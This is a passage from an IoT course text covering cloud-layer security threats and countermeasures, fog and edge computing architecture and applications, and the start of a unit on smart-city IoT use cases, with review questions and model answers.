Cloud layer: The IoT Cloud Layer represents the back- end services required
to set up, manage, operate, and extract business value from an IoT system. It
will deliver the application specific services to the user so they can operate and
monitor the devices. Following are the threats in the Cloud Layer. Table 3
shown below depicts the major threats in the Cloud layer:

17
Application
Development, Table 3: Threats in the Cloud Layer
Fog Computing and
Case Studies

Name of the Description


Threat
Data security All the Data that is collected will be processed and stored on the cloud,
in cloud Cloud service provider will be hold the responsibility of protecting
computing this data.

Application Most applications are hosted on the cloud as a Software as a Service


layer attacks and delivered through web services, so the attacker can easily
manipulate the application layer protocols and get access to the IoT
network.
An attack on Security of cloud virtual machines is very important and any
Virtual security breach can cause the failure of entire IoT environment.
Machines

10.7.1 Counter Measures


Basic IoT system requires following to be fulfilled in order to become a secure
system.

 Authentication
 Authorization
 Confidentiality
 Integrity
 Non Repudiation

Authentication verifies the identity of the users or a device in an IoT system.


Authorization checks for what are the privileges possess by the authorized
entity to execute on the system. In terms of confidentiality and the data
integrity it will make sure that the data is encrypted so no one can tamper even
in the storage or during the transmission. Non repudiation assures that
authenticity of the origin source of data and integrity of data. Exploiting an IoT
system deals with compromising any of the aforementioned security attributes
which we need to take actions before compromising.

The Open Web Application Security Project(OWASP), has released latest


vulnerabilities that will target the IoT devices and following are the current
ranked list of the top issues and things to avoid:

 Weak, guessable, or hardcoded passwords


 Insecure network services
 Insecure ecosystem interfaces
 Lack of secure update mechanism
 Use of insecure or outdated components
 Insufficient privacy protection
 Insecure data transfer and storage
 Lack of device management
 Insecure default settings
 Lack of physical hardening

18
IoT Application
Following table 4 will depict what we can do to improve the security in Development

terms of authentication, authorization, confidentiality, data integrity and


non-repudiation security attributes.
Table 4: Countermeasures to Improve the Security
Security Action Description
attribute
Authentication Use security credentials Identification of users and
Use identity and access management devices need to be done
methods and need to configure
strong security credentials
for the devices by removing
the default credentials.
Authorization
Confidentiality Use appropriate encryption mechanism Data must be encrypted so
as Devices may contain less only authorized users can
computational power access the data.

Data integrity Use Hashing techniques Non tampering of data can


be assured by
various hashing techniques

Non repudiation Using Digital signatures Origin source of the data


can be assured by using
digital signatures.

 Check Your Progress 1

1) Compare and contrast various IoT platforms discussed in this unit with
reference to the parameters like services availability and device
management platform.

…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
2) What are the various factors and concerns those might have an impact on
compromising the efforts to secure the IoT devices?

…………………………………………………………………………………
…………………………………………………………………………………
3) Explore and write various current innovative techniques to mitigate the
security attacks.
…………………………………………………………………………………
…………………………………………………………………………………

19
Application
Development,
Fog Computing and 10.8 SUMMARY
Case Studies

In this unit we have studied essential requirements for IoT Application


development, challenges of IoT Application development, IoT Application
Development Frameworks, Open Source platforms for developing IoT
applications, Tools for designing and developing IoT application prototypes,
IoT application testing strategies and the security issues in IoT systems.

10.9 SOLUTIONS / ANSWERS

Check Your Progress 1

1. Comparison of various IoT platforms (Open-source) are summarized


below in table 5:
Table 5: Comparison between various open source IoT Platforms

IoT Platform Services Device


Management
Platformform
KAA IoT Supports Various Hardware Types, Device Yes
Management, Reliably Collect Data,
Configuration Management, Support
Various Integrations, Command Execution,
Connect Devices directly or via Gateways
MACCHINA.io Secure Web Access To IoT Devices From Yes
Anywhere, Remote Control Of IoT Devices
With Apps and Voice Assistants, Secure
Remote Management via Shell and Desktop
(VNC & RDP).
ZETTA Run Everywhere, API Every Thing, No
Support almost all Device Protocols.
DeviceHive Provide End-to-End Solutions, Consulting No
and Commercial Support, Device
Enablement, etc.
DSA (Distributed Provides an open-source Apache 2.0 No
Services licensed implementation of a DSBroker
Architecture) written in Dart.

2. Given below are various factors and concerns those might impact on
compromising the efforts to secure the IoT devices:

Occasional update: usually, IoT manufacturers update security


patches quarterly. The OS versions and security patches are also
upgraded similarly. Therefore, hackers get sufficient time to crack the
security protocols and steal sensitive data.

Embedded passwords: IoT devices store embedded passwords, which


helps the support technicians to troubleshoot OS problems or install

20
IoT Application
necessary updates remotely. However, hackers could utilize the feature Development

for penetrating device security.

Automation: often, enterprises and end-users utilize the automation


property of IoT systems for gathering data or simplifying business
activities. However, if the malicious sites are not specified, integrated
AI can access such sources, which will allow threats to enter into the
system.

Remote access: IoT devices utilize various network protocols for


remote access like Wi-Fi, ZigBee, and Z-Wave. Usually, specific
restrictions are not mentioned, which can be used to prevent
cybercriminals. Therefore, hackers could quickly establish a malicious
connection through these remote access protocols.

Wide variety of third-party applications: several software


applications are available on the Internet, which can be used by
organizations to perform specific operations. However, the authenticity
of these applications could not be identified easily. If end-users and
employees install or access such applications, the threat agents will
automatically enter into the system and corrupt the embedded database.

Improper device authentication: most of the IoT applications do not


use authentication services to restrict or limit network threats. Thereby,
attackers enter through the door and threaten privacy.

Weak Device monitoring: usually, all the IoT manufacturers configure


unique device identifiers to monitor and track devices. However, some
manufacturers do not maintain security policy. Therefore, tracking
suspicious online activities become quite tricky.

3. Some of the current innovative techniques to mitigate the security


attacks are:

Deploying encryption techniques: Enforcing strong and updated


encryption techniques can increase cybersecurity. The encryption
protocol implemented in both the cloud and device environments. Thus,
hackers could not understand the unreadable protected data formats and
misuse it.

Constant research regarding emerging threats: The security risks


are assessed regularly. Organizations and device manufacturers
developed various teams for security research. Such teams analyze the
impact of IoT threats and develop accurate control measures through
continuous testing and evaluation.

Increase the updates frequency: The device manufacturers should


develop small patches rather than substantial updates. Such a strategy
can reduce the complexity of patch installation. Besides, frequent
21
Application
Development,
updates will help the users to avert cyber threats resources from diverse
Fog Computing and
Case Studies sources.

Deploy robust device monitoring tools: Most of the recent research


proposed to implement robust device monitoring techniques so those
suspicious activities can be tracked and controlled easily. Many IT
organizations introduced professional device monitoring tools to detect
threats. Such tools are quite useful for risk assessment, which assists
the organizations in developing sophisticated control mechanisms.

Develop documented user guidelines to increase security


awareness: Most of the data breaches and IoT attacks happen due to a
lack of user awareness. Usually, IoT security measures and guidelines
are not mentioned while users purchase these devices. If device
manufacturers specify the potential IoT threats clearly, users can avoid
these issues. Organizations can also design effective training programs
to enhance security consciousness. Such programs guide users to
develop strong passwords to update them regularly. Besides, users are
instructed to update security patches regularly. The users also taught
and requested to avoid spam emails, third-party applications, or
sources, which can compromise IoT security.

10.10 FURTHER READINGS

1. Internet of Things, Jeeva Jose, Khanna Publishing, 2018.


2. Internet of Things - A Hands-on Approach, Arshdeep Bahga and Vijay
Madisetti, Universities Press, 2015.
3. IoT Fundamentals: Networking Technologies, Protocols and Use Cases
for the Internet of Things, Hanes David, Salgueiro Gonzalo, Grossetete
Patrick, Barton Rob, Henry Jerome, Pearson, 2017.
4. Designing the Internet of Things, Adrian Mcwen, Hakin Cassimally,
Wiley, 2015.

22
UNIT 11 FOG COMPUTING AND EDGE COMPUTING

11.1 Introduction
11.2 Objectives
11.3 Introduction to Fog Computing
11.4 Cloud Computing Vs Fog Computing
11.5 Fog Architecture
11.6 Working of Fog
11.7 Advantages of Fog
11.8 Applications of Fog
11.9 Challenges in Fog
11.10 Edge Computing
11.11 Working of Edge Computing
11.12 Cloud Vs Fog Vs Edge Computing
11.13 Applications of Edge Computing
11.14 Summary

11.1 INTRODUCTION

Use of emerging technologies like IoT, on-line applications and popularity of social networking are
leading to an increasing number of users on the internet. Hence data getting generated on a daily basis is
also increasing at an enormous rate leading to increasing workload on Cloud. Also, demand for increased
bandwidth and need for real time applications or analytics is also increasing. Fog computing is a
technology introduced to collaborate with cloud computing for providing solutions. It attempts to bring
cloud-like resources – memory, storage, and compute near end users.

11.2 OBJECTIVES

After going through this unit, you should be able to:

 Know about Fog computing technology


 Know about the differences between fog and cloud computing
 Know about architecture, advantages, applications and challenges associated with fog
 Know about Edge computing
 Differentiate between Cloud, Fog and Edge computing
 Know about Applications of Edge computing

11.3 INTRODUCTION TO FOG COMPUTING

With increasing use of Internet of Things (IoT) devices and internet users, network traffic, storage and
processing load is also increasing at an exponential rate. Cisco in 2020 estimated that by the end of 2023,
29.3 billion devices and 5.3 billion internet users will be there.

1
Cloud computing technology offers computation service over the internet on a pay-per-use basis.
Resources offered by this technology like – storage, compute or network can be dynamically provisioned
according to user’s demand. This technology offers several advantages like – low cost, rapid
provisioning, high computation power, flexible, automatic updates, no management or monitoring needed
from user’s side, etc. Enormous amounts of data generated by IoT devices and users can be stored and
processed on cloud servers. But in addition to these benefits, there are several shortcomings associated
with this technology – like increased response time due to distant location of servers and centralized
architecture, security as resources are remotely stored and provided over insecure internet, demand of
higher network bandwidth, increasing load on network due to further increasing users.

Cisco in 2014 introduced a term called ‘Fog Computing’ to a technology which extends computing to the
edge of the network. The fog metaphor is used to represent a cloud close to the ground, similar to as fog
concentrates on the edge of the network.

Fog computing is a technology in which resources like - compute, data, storage and applications are
located in-between the end user layer (where data is generated) and the cloud. Devices like gateways,
routers, base stations can be configured as fog devices. It can bring all the advantages offered by cloud
computing closer to the location where data is generated; hence leading to reduced response time, reduced
bandwidth requirements, enhanced security and other benefits.

OpenFog Consortium defined fog computing as “a horizontal system level architecture that distributes
computing, storage, control and networking functions closer to the users along a cloud-to-thing
continuum”.

Fog computing is not introduced to replace cloud computing. Resources offered by Fog servers or devices
are limited as compared to resources offered by huge cloud infrastructure. Hence the cloud computing
model will continue to operate as a centralized computing system (needed for high processing power and
storage) with few capabilities shifted towards fog devices which are present in the proximity of users for
serving low latency operations.

Three layer logical architecture of fog computing is given in Fig 1. The first layer represents the end
devices layer, middle layer represents the fog devices, and the top most layer represents the cloud
servers.

2
Fig 1. Logical Architecture of Fog computing

11.4 CLOUD COMPUTING Vs FOG COMPUTING

Cloud computing is defined as a model that allows ubiquitous access to shared resources on demand over
the internet on a pay-per-use basis. Large pools of resources are maintained at data centers by the cloud
service providers. Virtual resources from these pools are dynamically provisioned and allocated to users
on demand. High performance can be achieved by using cloud resources but it may not be used for real
time applications that demand higher response time due to the distant location of cloud servers.

Fog computing is introduced to fill up the gap between the cloud servers and end devices. Fog servers like
cloud servers can offer various resources – compute, storage, or network. Due to its proximity to end
users, it allows computations to be done faster or near real time. Hence it is better suited for latency
sensitive applications. Since fog computing makes use of devices like- switches, routers, gateways; it is
generally limited by resources and hence offers less computation power as compared to cloud.

Some of the differences between cloud computing and fog computing are given in Table 1.

Cloud Computing Fog Computing

3
Architecture in centralized Architecture is distributed

Distant location from the end users In the proximity of end users

Huge amount of resources Limited amount of resources

Higher computation capabilities Lower computation capabilities

More response time Less response time

Can be accessed over internet Can be accessed by various protocols and standards

Less security More security

Table 1: Differences between Cloud Computing and Fog Computing

11.5 FOG ARCHITECTURE

General architecture of fog computing is composed of three layers (as shown in Fig 1.)

1. End Devices Layer - Layer 1 is composed of end devices which can be mobile devices, IoT
devices, computer systems, camera, etc. Data either captured or generated from these end
devices is forwarded to a nearby fog server at Layer 2 for processing.

2. Fog Layer - Layer 2 is composed of multiple fog devices or servers. They are placed at the
edge of a network, between layer 1 and cloud servers. They can be implemented in devices like –
switches, routers, base stations, access points or can be specially configured fog servers.

3. Cloud Layer - Layer 3 is composed of Cloud data centers. They consist of huge
infrastructure - high performance servers, massive storage devices, etc. They provide all cloud
benefits like- high performance, automatic backup, agility.

Check Your Progress 1

1. What is Fog computing?


2. Explain differences between Cloud computing and Fog computing.
3. Explain architecture of Fog computing.

4
11.6 WORKING OF FOG

Adding fog layer in-between the centralized cloud layer and end devices layer, improves the overall
performance of the system. Working of fog computing in collaboration with cloud computing is described
below.

1. Huge amounts of data is generated from end devices and IoT devices like –mobile, camera,
laptops, etc. This data is then forwarded to the nearest fog server (in layer 2) for processing.

2. Latency sensitive data or applications that require real time responses, are processed by the fog
servers on priority basis. Results of processing or actions to be performed are then reverted
back to the end devices. Fog servers also send the summarized results to cloud servers in layer
3 for future analysis. This allows only filtered data to be offloaded to the cloud layer.

3. Fog servers, if not able to serve requests due to unavailability of resources or information, can
either interact with neighbouring servers or may forward the request cloud servers at Layer 3
depending upon the offloading strategy. Also, time in-sensitive data is generally forwarded to
Cloud servers for processing and storage. After serving the task, response is given to users at
layer 1 via. Fog servers.

11.7 ADVANTAGES OF FOG

There are various advantages of using fog computing technology due to its architecture-

1. Low latency
Fog servers provide the benefit of faster response due to its geographical location i.e. they are
located nearby from the point of data origination. It is suited for time sensitive or real-time
applications.

2. Reduce bandwidth requirements


Fog servers allow lower bandwidth consumption because data gets processed at nearby fog
servers, hence avoiding huge amounts of data to be forwarded to distant cloud servers for
processing.

3. Reduced Cost
Most of the processing is done locally at the fog layer, leading to conservation of networking
resources and hence reducing the overall cost of operations.

4. Security and Privacy

5
It also allows applications to be secure and private because data can be processed locally instead
of forwarding to remote centralized cloud infrastructure.

5. Mobility
Fog devices are mobile. They can be easily added or removed from the network and hence offers
flexibility.

11.8 APPLICATIONS OF FOG

Fog computing since its introduction, is gaining popularity due to its applications in various industries.
Some of the applications are –

Smart Cities

Cities that make use of technology to improve quality of life and services provided to people, can be
called smart cities. Fog computing can play a vital role in building smart cities. With the help of smart
devices, IoT devices and fog devices, it is possible to do tasks like – creating smart homes and buildings
by energy management of buildings, maintaining security, etc; intelligent cities by building smart parking
system, infrastructure, traffic management, environment monitoring, etc ; intelligent hospitals, highways,
factories, etc.

Fig 2: Smart Cities Scenario


Source: www.OpenFogConsortium.org

Smart Car and Traffic Control System


6
By making use of IoT devices and ubiquitous fog devices, vehicle-to-vehicle (V2V) and vehicle-to-
infrastructure (V2I) communication is possible. Vehicles can communicate with internal, as well as
external environments with the help of sensors. Sensors and actuators can also be attached with
infrastructure along the roadside like – traffic light, street boards, gates, etc. Sensors can forward the data
collected to fog devices, which may be either attached to the vehicle or present at a nearby location. Fog
devices after computation can direct the vehicle or infrastructure to take action with the help of various
controls (actuators). For example- by detecting vehicles coming from the wrong direction or pedestrians
coming, a traffic light may signal red to avoid collisions, or other vehicles may automatically be directed
to apply breaks.

Fig 3: Smart car and Traffic control system scenario


Source: www.OpenFogConsortium.org

Smart Grids

Electrical grid is a network which delivers energy generated from various sources to consumers. The
process of efficient distribution of energy is possible by making use of fog computing. IoT sensors can
monitor energy generated from various sources – like wind energy farms, thermal plants, hydraulic plants,
etc. This data is then passed on to the nearby fog server to identify the optimal source of energy to be used
7
and can also identify problems like equipment malfunctions. Depending upon the problems it may also
identify alternative sources of energy to be used in order to maintain efficiency.

Fig 4: Smart Grid

Smart Healthcare Systems

Fog computing has applications in the healthcare system also. Health reports of patients can be recorded
using different types of sensors and forwarded to fog devices. Fog devices after performing analysis
examples - diagnose cardiac diseases, etc can take necessary actions.

Surveillance

Security and Surveillance cameras are deployed in many areas. It is difficult to send massive amounts of
data collected by these cameras to cloud servers due to bandwidth constraints. Hence data collected from
these can be forwarded to nearby fog servers. Fog servers in turn can perform video processing to find out
problems like theft, kidnapping, murders, finding missing people. Necessary action can then be taken by
generating alerts or reporting to police stations.

11.9 CHALLENGES IN FOG

Fog computing offers several advantages, but there are several challenges associated with it. Some of
them are –

1. Complexity

Fog devices can be diverse in architecture and located at different locations. Fog devices further
store and analyse their own data hence add more complexity to the network.

2. Power Consumption

8
Fog devices require high power consumption for proper functioning. Adding more fog devices
increases energy consumption, which results in an increase of cost.

3. Data Management

Data is distributed across multiple fog devices hence data management and maintaining
consistency is challenging.

4. Authentication

Establishing trust and authentication may raise issues.

5. Security

Since there are many fog devices, each with a different IP. Getting access to personal data by
spoofing, taping, and hacking can be a challenge.

Check Your Progress 2

1. Explain advantages and challenges associated with fog computing.


2. What are the various application areas of fog computing.

11.10 EDGE COMPUTING

Edge computing is a technology which offers data processing on the same layer where data is generated
by making use of edge devices having computation capabilities. This allows data to be processed even
faster than processing at fog devices at no or a very low cost. This also increases utilization of edge
devices.

Edge or end devices found today are smarter with various advanced features like artificial intelligence
enabled in them. Edge computing takes advantage of this intelligence to reduce load on network or cloud
servers. Also edge devices when used for computation offers hardware security along with low power
consumption. It can improve security by encrypting data closer to the network core.

Edge computing is often seen as similar to fog computing but there are several differences. Edge
computing devices are limited in their resource capabilities and therefore cannot replace existing Cloud
or Fog computing technology. But edge computing when added with these technologies can offer
numerous advantages and applications. Fig 5 shows the Cloud-Fog-Edge collaboration scenario.

9
Fig 5: Cloud – Fog – Edge Computing architecture

11.11 WORKING OF EDGE COMPUTING

Edge computing allows data processing to be done at the network edge. This can offer several advantages
like – decreases latency, reduces data to be offloaded to cloud or fog, reduces cost of bandwidth, reduces
energy consumption, etc.

Edge computing can work in collaboration with cloud computing only or can be either implemented with
Cloud –Fog collaboration environment.

Instead of sending all the data directly to the cloud or fog layer from the edge devices, data is first
processed at the edge layer. Processing data at the edge layer gives near real time response due to physical
proximity of edge devices. As data generated at the edge layer is huge, it cannot be handled entirely at the
edge layer. Hence it is offloaded to the Cloud or Fog layer. In Cloud-Fog-Edge collaboration scenario,
data from edge layer is first offloaded to fog servers over a localized network, which in turn can offload it
to cloud servers for updates or further processing needs. In Cloud-Edge scenarios, data after processing
on the edge layer, can be offloaded to the cloud layer as resources available at the edge layer are
insufficient to handle large amounts of data. Here the edge layer can decide what is relevant and what is
not before sending to further layers, hence reducing load on cloud and fog servers.

10
11.12 CLOUD Vs FOG Vs EDGE COMPUTING

Cloud, fog and edge computing all are concepts of distributed computing. All of them perform
computation but at different proximity levels and with different resource capacities. Adding Edge and fog
layer to the cloud reduces the amount of storage needed at cloud. It allows data to be transferred at a
faster data rate because of transferring relevant data. Also the cloud would store and process only relevant
data resulting in cost reduction.

Edge computing devices are located at the closest proximity to users. Fog computing devices are located
at intermediate proximity. Cloud computing devices are at distant and remote locations from users. Fog
computing generally makes use of a centralized system which interacts with gateways and computer
systems on LAN. Edge computing makes use of embedded systems directly interfacing with sensors and
controllers. But this distinction does not always exist. Some of the common differences between Cloud,
Fog and Edge computing are shown in Table 2.

Cloud Computing Fog Computing Edge Computing

Centralized approach Distributed approach Distributed approach

Large amount of resources Intermediate amount of resources Limited resources

High latency Medium latency Low latency

Low data rate Medium data rate High data rate

Globally distributed Regionally distributed Locally distributed

Non-real time response Near real time response Real time response
Can be accessed with internet or
Can be accessed with internet Can be accessed without internet
without internet

Table 2: Differences between Cloud, Fog and Edge Computing

11.13 APPLICATION OF EDGE COMPUTING

Edge computing has applications similar to fog computing due to its close proximity. Some of the
applications are listed below.

1. Gaming

11
Gamings which require live streaming feed of the game depends upon latency. In this, edge
servers are placed closed to the gamers to reduce latency.

2. Content Delivery
It allows caching of data like- web pages, videos near users in order to improve performance by
delivering content fastly.

3. Smart Homes
IoT devices can collect data from around the house and process it. Response generated is secure
and in real time as round-trip time is reduced. For example –response generated by Amazon’s
Alexa.

4. Patient monitoring
Edge devices present on the hospital site can process data generated from various monitoring
devices like- temperature sensors, glucose monitors etc. Notifications can be generated to depict
unusual trends and behaviours.

5. Manufacturing
Data collected in manufacturing industries through sensors can be processed in edge devices.
Edge devices here can apply real time analytics and machine learning techniques for reporting
production errors to improve quality.

Check Your Progress 3

1. What is Edge computing.


2. Explain differences between cloud, fog and edge computing.
3. State some of the applications of edge computing.

11.14 SUMMARY

In this unit two emerging technologies – Fog computing and Edge computing are discussed. Cisco
introduced Fog Computing as a technology which extends computing to the edge of the network. In this
technology, resources like - compute, data, storage and applications are located in-between the end user
layer and the cloud. It reduces response time, reduces bandwidth requirements and enhances security.
Edge computing is a technology which offers data processing on the same layer where data is generated
by making use of edge devices having computation capabilities. These technologies cannot replace cloud
computing but can work in collaboration with cloud computing in order to improve performance.

Solutions to Check your progress 1

1. Cisco in 2014 introduced a term called ‘Fog Computing’ to a technology which extends
computing to the edge of the network. Fog computing is a technology in which resources like -
12
compute, data, storage and applications are located in-between the end user layer (where data is
generated) and the cloud. Devices like gateways, routers, base stations can be configured as fog
devices. It can bring all the advantages offered by cloud computing closer to the location where
data is generated; hence leading to reduced response time, reduced bandwidth requirements,
enhanced security and other benefits.

2. Some of the differences between cloud computing and fog computing are :-

Cloud Computing Fog Computing

Architecture in centralized Architecture is distributed

Distant location from the end users In the proximity of end users

Huge amount of resources Limited amount of resources

Higher computation capabilities Lower computation capabilities

More response time Less response time

Less security More security

3. Architecture of fog computing is composed of three layers :-

1. End Devices Layer – It is composed of end devices which can be mobile devices, IoT
devices, computer systems, camera, etc. Data either captured or generated from these end
devices is forwarded to a nearby fog server at Layer 2 for processing.

2. Fog Layer – It is composed of multiple fog devices or servers. They are placed at the edge
of a network, between layer 1 and cloud servers. They can be implemented in devices like –
switches, routers, base stations, access points or can be specially configured fog servers.

3. Cloud Layer – It is composed of Cloud data centers. They consist of huge infrastructure -
high performance servers, massive storage devices, etc. They provide all cloud benefits like- high
performance, automatic backup, agility.

Solutions to Check your progress 2

1. Various advantages associated with fog computing are –


a) Low latency
b) Reduced bandwidth
c) Reduced cost
d) Mobility

13
Various challenges associated with fog are –

a) Complexity
b) Maintaining security
c) Authenticating
d) Additional power consumption

2. Various application areas of fog computing are –

a) Smart Cities
Fog computing can play a vital role in building smart cities. With the help of smart devices,
IoT devices and fog devices, it is possible to do tasks like – creating smart homes and
buildings by energy management of buildings, maintaining security, etc.

b) Smart Car and Traffic Control System


By making use of IoT devices and ubiquitous fog devices, vehicle-to-vehicle (V2V) and
vehicle-to-infrastructure (V2I) communication is possible. Fog devices after computation can
direct the vehicle or infrastructure to take action with the help of various controls (actuators).

c) Surveillance
Security and Surveillance cameras are deployed in many areas. Data collected from these can
be forwarded to nearby fog servers. Fog servers in turn can perform video processing to find
out problems like theft, kidnapping, murders, etc.

Solutions to Check your progress 3

1. Edge computing is a technology which offers data processing on the same layer where data is
generated by making use of edge devices having computation capabilities. This allows data to be
processed even faster than processing at fog devices at no or a very low cost. This also increases
utilization of edge devices.

2. Various differences between cloud, fog and edge computing are –

Cloud Computing Fog Computing Edge Computing


Centralized approach Distributed approach Distributed approach
Intermediate amount of
Large amount of resources Limited resources
resources
High latency Medium latency Low latency
Low data rate Medium data rate High data rate
Globally distributed Regionally distributed Locally distributed
Non-real time response Near real time response Real time response
Can be accessed with Can be accessed with internet or Can be accessed without
internet without internet internet

14
3. Some applications of edge computing are -

a) Gaming
Gamings which require live streaming feed of the game depends upon latency. In this, edge
servers are placed closed to the gamers to reduce latency.
b) Content Delivery
It allows caching of data like- web pages, videos near users in order to improve performance
by delivering content fastly.
c) Smart Homes
IoT devices can collect data from around the house and process it. Response generated is
secure and in real time as round-trip time is reduced. For example –response generated by
Amazon’s Alexa.

15
UNIT 12 IoT CASE STUDIES
Structure

12.0 Introduction
12.1 Objectives
12.2 IoT Use Cases for Smart Cities
12.3 Smart Homes
12.4 Applications of IoT in Agriculture
12.5 Smart Transportation
12.6 Smart Grids
12.6.1 Key Features of Smart Grid
12.6.2 Benefits of Smart Grid
12.7 Connected Vehicles
12.7.1 Connected Cars
12.7.2 How does Connected Car Technology Work?
12.7.3 Features of Connected Cars
12.7.4 Types of Connectivity
12.8 Smart Healthcare
12.9 Industrial IoT (IIoT)
12.9.1 Industry 4.0 and IIoT
12.9.2 IIoT Architecture
12.9.3 Applications of IIoT
12.9.4 IIoT Use Cases
12.10 Summary
12.11 Solutions/Answers
12.12 Further Readings

12.0 INTRODUCTION

In the earlier unit, we had studied various concepts namely - Fog Computing,
Edge Computing, IoT networking and Connectivity Technologies. After going
through the basics of IoT in previous units, we will focus on applications of
IoT in this unit.

Artificial Intelligence (AI) and the Internet of Things (IoT) are two of the
technologies which are rapidly growing day by day and have the scope
of heading towards an extremely intelligent future.

IoT enables seamless communication between people and things by connecting


everyday utilities such as home appliances, security systems, kitchen
appliances, thermostats, cars, baby monitors, and more via embedded unique
identifiers (UIDs). The connected devices transmit data over the internet
without needing human-to-computer interaction.

The number of connected mobile IoT devices is set to grow immensely and is
expected to reach 23.14 billion by 2027 and 29 billion by 2030. Organizations
across the spectrum are using IoT to operate more effectively. IoT allows
enterprises to improve decision-making, enhance customer service, and
1
Application
Development, increase business value. Additionally, cloud platform availability empowers
Fog Computing and
Case Studies individuals and businesses to access and scale up infrastructure without
managing it.

In addition, there are 4 pillars of IoT applications. They are as follows:

 Connecting people in more meaningful and valuable ways - The


Internet has become an indispensable part of most people’s lives, and
this is unlikely to change anytime soon.
 Transforming data into intelligence in order to make better decisions
- Sensors generate massive amounts of raw data for the purpose of
analysis, but there is no standard format for storing and reusing it.
 Providing the appropriate information to the appropriate person - If
we want to learn something new and benefit from it, we must deliver it
to the right person.
 Using the right machine at the right time - The use of smart devices in
our daily lives is also becoming more common.

In this unit we will focus on various applications of IoT in Smart Cities, Smart
Homes, Smart Transportation, Smart Grids, Smart Healthcare, Connected
Vehicles and Industrial IoT.

12.1 OBJECTIVES

After going through this unit, you shall be able to:

 understand various IoT applications;


 list and describe various use-cases for Smart Cities;
 describe the IoT applications of Smart Homes;
 discuss key features, benefits and applications of Smart Grids;
 describe the features and working of connected vehicles;
 elucidate the applications of healthcare; and
 explain Industry 4.0, IIoT and applications of IIoT.

12.2 IoT USE CASES FOR SMART CITIES

Big and small cities are becoming densely populated and in this regard,
municipalities are facing a wide range of challenges that require immediate
attention. Urban crimes, traffic congestions, sanitation problems and
environmental deterioration are some of the common challenges of increased
population in urban areas and to prevent these, municipalities turn to the
adoption of smart technologies, such as the Internet of Things (IoT).
IoT holds the potential to cater to the needs of the increased urban population
while making living more secure and comfortable. Referring to this, the IoT
use cases for smart cities are limitless as it contributes to public safety,
optimized traffic control and a healthier environment etc., which are the main
essences of smart city developments.

2
IoT Case Studies
The following section focus on the popular use cases of IoT for smart cities
that are worth for the implementation.

12.2.1. Smart Traffic Management

With the increased population, the traffic congestion on the roads is also
increasing. However, smart cities aim to make the citizens reach the desired
destination efficiently and safely. To achieve this aim, municipalities turn to
smart traffic solutions which are enabled by IoT technologies.

Different types of sensors are utilized in smart traffic solutions which also
extract the relevant data from the driver’s smartphones to determine the speed
of the vehicles and GPS location. Concurrently, monitoring of the green traffic
light timing is also enabled by the smart traffic lights which are linked to the
cloud management platform. Based on the current traffic situation, the traffic
lights are automatically altered and this ultimately prevents traffic congestion
on the roads. Furthermore, while utilizing historical data, IoT solutions can
predict the future traffic conditions in smart cities and can enable the
municipalities to prevent potential congestions.

12.2.2. Smart Parking

The issue of parking in cities seems inevitable but many cities around the globe
are adopting IoT enabled smart parking solutions and providing hassle-free
parking experiences to the citizens. With the help of road surface sensors on
parking spots and GPS data from the driver’s phone, smart parking solutions
identify and mark the parking spots that are available or occupied. Alongside,
IoT based smart parking solution creates real-time parking map on either
mobile or web application. The sensors embedded in the ground send data to
the cloud and server which notifies the driver whenever the nearest parking
spot is free. Instead of blindly driving around, a smart parking solution helps
the driver to find the parking spots easily.

12.2.3. Public Transport Management

Managing public transport efficiently is one of the major concerns of the big
cities. However, IoT offers a use case for smart cities in this regard as well.
The IoT sensor associated with public transport gathers and analyzes data
which help the municipalities to identify the patterns in which the citizens are
using public transport. Later on, this data-driven information is used by the
traffic operators to achieve the standardized level of punctuality and security in
transportation along with enhancing the travelling experience of the citizens.

12.2.4. Utility Management

IoT enabled smart city solutions give citizens complete control over home
utilities and save their money as well. Different utility approaches are powered
by IoT. These include smart meter and billing solutions, identification of
consumption patterns and remote monitoring. Smart meters transfer data to the
3
Application
Development, public utility through a telecom network, making the meter readings reliable.
Fog Computing and
Case Studies This solution also enables utility companies to accurately bill the amount of
gas, energy and water consumed per household. A smart network of meters
facilitates utility companies to monitor the consumption of resources in real-
time to balance the supply and demand. This indicates that the IoT not only
offers the benefit of utility control to the consumers but also helps the utility
companies to manage their resources.

12.2.5. Street Lighting

Smart city development aims to improve the quality of life and make living
easy, cost-effective and sustainable. Majority of the traditional street lights
equipped on the roads waste power as they are always switched on even when
no vehicle or a person is passing. IoT enables the cities to save power by
embedding sensors in street lights and connecting them with the cloud
management solution. This helps in managing the lighting schedule. Smart
lighting solutions collect data movement of vehicles and people and link it to
the historical data (e.g. time of day, public transport schedule and special
events). Later on, the data is analyzed to improve and manage the lighting
schedule in smart cities. In other words, it can be said that the smart lighting
solution analyzes the outer conditions and directs the street light to switch on
or switch off, brighten or dim where required.

12.2.6. Waste Management

The waste collection operators in cities use predefined schedules to empty the
waste containers. This is a traditional waste collection approach that is not only
inefficient but also leads to unnecessary use of fuel consumption and
unproductive use of waste containers by waste collecting trucks. IoT offers
waste collection optimization by tracking waste levels along with providing
operational analytics and route optimization to manage the waste collection
schedule efficiently.

IoT sensors are attached to the waste containers. These sensors monitor the
level of waste in the containers. When the waste reaches the threshold, waste
truck drivers are immediately notified through the mobile application. Hence,
only the full containers are emptied by the truck drivers.

12.2.7. Environmental Well-being

Smart cities are focused on providing a healthy environment to the citizens.


IoT-enabled smart city solutions help the municipalities in monitoring the
environmental conditions that might be harmful to human beings. For instance,
sensors can be attached to the water grid to inspect the quality of water in
cities. The cloud platforms with which the sensors are in communication
immediately generate triggers when the chemical composition of the water
changes or leakage occurs. This smart solution helps quality management
organizations prevent water contamination and fix the issue as soon as
4
IoT Case Studies
possible. The IoT solutions are also applicable to measure the air quality,
identify the areas where air pollution is critical and recommends solutions to
improve the air quality.

12.2.8. Public Safety

Providing safety to the citizens is an ultimate goal of municipalities. In this


regard, IoT-based smart city technologies provide decision-making tools,
analytics and real-time monitoring for enhancing public safety. Sensors and
CCTV cameras are deployed throughout the city and data from them is
combined to predict the crime scenes. This allows the law enforcement bodies
and police to track the perpetrators in real-time and stops them from causing
potential harm to the public.

12.2.9. Improved Bike Sharing Services with Geolocation

Bike sharing is becoming extremely popular in cities to tackle the challenges


of climate change and offer residents an alternative way to commute. With
timely updates on the location of bikes sent through the IoT network, cities and
bike-sharing companies can operate services more efficiently by matching
demand to supply, according to areas where bikes are needed. This not only
helps to curb irresponsible behavior such as illegal parking and bike hogging, it
also reduces problems of theft and vandalism.

12.2.10. Monitor Employee Attendance Remotely

Time clocks connected to the Internet via the IoT network allow employers to
monitor the attendance of workers on remote job sites. Forget the hassle of
SIM cards for tracking employee comings and goings with constant and real-
time connected monitoring.

